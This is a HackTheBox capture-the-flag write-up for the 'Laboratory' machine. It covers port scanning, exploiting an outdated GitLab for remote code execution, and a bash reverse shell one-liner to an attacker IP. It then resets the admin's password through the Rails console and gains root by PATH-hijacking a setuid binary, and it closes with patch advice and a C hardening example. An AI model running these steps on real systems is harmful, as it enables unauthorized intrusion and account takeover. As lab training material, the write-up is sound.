Hackthebox Laboratory WriteUp

Jim Solomon
Apr 17, 2021 · 4 min read

Overview:

Laboratory is an easy and fun machine. It exploits a vulnerable GitLab instance through the built-in Rails console, a command-line tool for interacting with GitLab through commands such as changing a user's password. The foothold is to take advantage of the Rails console by changing admin dexter's password, then finding his SSH key in his git repository. After getting into the shell, there is a vulnerable docker-security executable file that runs with root privilege. By running ltrace we can see it is looking for the chmod executable on the machine through the PATH. The last PriEsc step is to change that path to get code execution. With all that being said, let's just jump in!

Reconnaissance:

root@kali:~/htb/boxes/laboratory# nmap -A -T4 -p- -oN all -v 10.10.10.216
PORT    STATE SERVICE  VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA)
| 256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA)
|_ 256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519)
80/tcp open http Apache httpd 2.4.41
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Issuer: commonName=laboratory.htb
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-07-05T10:39:28
| Not valid after: 2024-03-03T10:39:28
| MD5: 2873 91a5 5022 f323 4b95 df98 b61a eb6c
|_SHA-1: 0875 3a7e eef6 8f50 0349 510d 9fbf abc3 c70a a1ca
| tls-alpn:
|_ http/1.1
Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are two domains, laboratory.htb and git.laboratory.htb; add them to the /etc/hosts file, then head over to those web servers.

The foothold:

laboratory.htb lists some usernames; other than that, there is not much information there. So, let's check the other domain, git.laboratory.htb. It is the GitLab instance for their server. This might be interesting.

Registered an account like xxx@laboratory.htb, then logged in. On the Help tab there is GitLab's version.

Searched for an exploit for this version; there is an RCE exploit.

Change the domain and port in the exploit script and run the exploit.

bash -c "bash -i >& /dev/tcp/10.10.14.12/443 0>&1"

Got a shell and used a reverse shell to get a new, stable shell. Poked around but did not find anything useful, so I'm going to change a user's password with the Rails console, then log in to that user's account on GitLab. Details about the Rails console are in the link below.

git@git:/home$ gitlab-rails console     
--------------------------------------------------------------------------------
GitLab: 12.8.1 (d18b43a5f5a) FOSS
GitLab Shell: 11.0.0
PostgreSQL: 10.12
--------------------------------------------------------------------------------

irb(main):002:0> user = User.first
user = User.first
=> #<User id:1 @dexter>
irb(main):003:0> user.password = 'secret_pass'
user.password = 'secret_pass'
=> "secret_pass"
irb(main):004:0> user.password_confirmation = 'secret_pass'
user.password_confirmation = 'secret_pass'
=> "secret_pass"
irb(main):005:0> user.save!
user.save!
Enqueued ActionMailer::DeliveryJob (Job ID: b4adbcfa-bd62-4b77-97b3-c1ec1faa0d07) to Sidekiq(mailers) with arguments: "DeviseMailer", "password_change", "deliver_now", #<GlobalID:0x00007f11e445c3b8 @uri=#<URI::GID gid://gitlab/User/1>>
=> true
irb(main):006:0>
root@kali:~/htb/boxes/laboratory# ssh -i key dexter@10.10.10.216
dexter@laboratory:~$ ls
user.txt

PriEsc to root:

Poking around, the hint on the GitLab indicates there is a docker-security file. It runs with root privilege and is executable. Use ltrace to see what it's doing, and we can see it is looking for the chmod executable on the machine through the PATH. So, let's change the lookup order using the PATH variable (details are in the blog linked below).

dexter@laboratory:/usr/local/bin$ cd /tmp
dexter@laboratory:/tmp$ echo "/bin/bash" > chmod
dexter@laboratory:/tmp$ chmod 777 chmod
dexter@laboratory:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/snap/bin
dexter@laboratory:/tmp$ export PATH=/tmp:$PATH
dexter@laboratory:/tmp$ cd -
/usr/local/bin
dexter@laboratory:/usr/local/bin$ ./docker-security
root@laboratory:/usr/local/bin# id&hostname
[1] 183179
laboratory
root@laboratory:/usr/local/bin# uid=0(root) gid=0(root) groups=0(root),1000(dexter)

Patch the vulnerabilities:

  1. Update the GitLab version.
  2. Remove the docker-security executable or make it use a secure, fixed path for the commands it runs.
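The second fix deserves a concrete illustration. The page does not show docker-security's source, so the following is an added example, not the box's binary: it assumes the binary reaches chmod through a shell with an unqualified name (which is what the ltrace observation implies) and uses a constructed target file path. The vulnerable function is the pattern that made the /tmp/chmod trick work; the hardened function runs chmod by absolute path, without a shell, under a fixed environment, so nothing the calling user controls decides which chmod executes.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Constructed target path; what the real docker-security binary chmods is not on the page. */
#define TARGET_FILE "/tmp/constructed_example_file"

/* VULNERABLE pattern: system() hands the string to /bin/sh, and the shell
 * resolves the bare name "chmod" through the caller's PATH. With
 * PATH=/tmp:$PATH (as in the writeup) /tmp/chmod runs as root instead. */
int chmod_vulnerable(const char *file)
{
    char cmd[512];
    snprintf(cmd, sizeof cmd, "chmod 700 %s", file);   /* also shell-injectable if 'file' is untrusted */
    return system(cmd);
}

/* Minimal environment for the child: a fixed PATH, nothing inherited. */
static char *const SAFE_ENV[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };

/* The PATH value the hardened version uses (exposed for checking). */
const char *safe_path_value(void)
{
    return SAFE_ENV[0] + strlen("PATH=");
}

/* 1 if 'p' is an absolute path, free of "..", inside a root-owned system directory. */
int is_trusted_program(const char *p)
{
    static const char *const trusted[] = { "/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/" };
    size_t n, i;

    if (p == NULL || p[0] != '/')
        return 0;
    n = strlen(p);
    if (strstr(p, "/../") != NULL || (n >= 3 && strcmp(p + n - 3, "/..") == 0))
        return 0;
    for (i = 0; i < sizeof trusted / sizeof trusted[0]; i++) {
        size_t len = strlen(trusted[i]);
        if (strncmp(p, trusted[i], len) == 0 && p[len] != '\0')
            return 1;
    }
    return 0;
}

/* HARDENED pattern: no shell, absolute program path, fixed environment.
 * Returns chmod's exit status, 127 if it could not be executed, -1 on fork/wait error. */
int chmod_hardened(const char *file)
{
    const char *prog = "/bin/chmod";
    pid_t pid;
    int status;

    if (!is_trusted_program(prog))
        return -1;
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "chmod", "700", (char *)file, NULL };
        execve(prog, argv, SAFE_ENV);   /* only returns on failure */
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    printf("trusted(/bin/chmod)=%d trusted(chmod)=%d trusted(/tmp/chmod)=%d\n",
           is_trusted_program("/bin/chmod"), is_trusted_program("chmod"),
           is_trusted_program("/tmp/chmod"));
    printf("hardened chmod on %s exited with %d\n", TARGET_FILE, chmod_hardened(TARGET_FILE));
    return 0;
}
```

The same reasoning applies to any other command the binary spawns: if it must run a helper as root, it should name it by absolute path and control the environment it passes down, which is exactly what the `export PATH=/tmp:$PATH` step above defeats in the original.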

Jim Solomon

Christian, Studying Cyber Security and Digital Forensics, Security Consultant at 12security.com | OSCP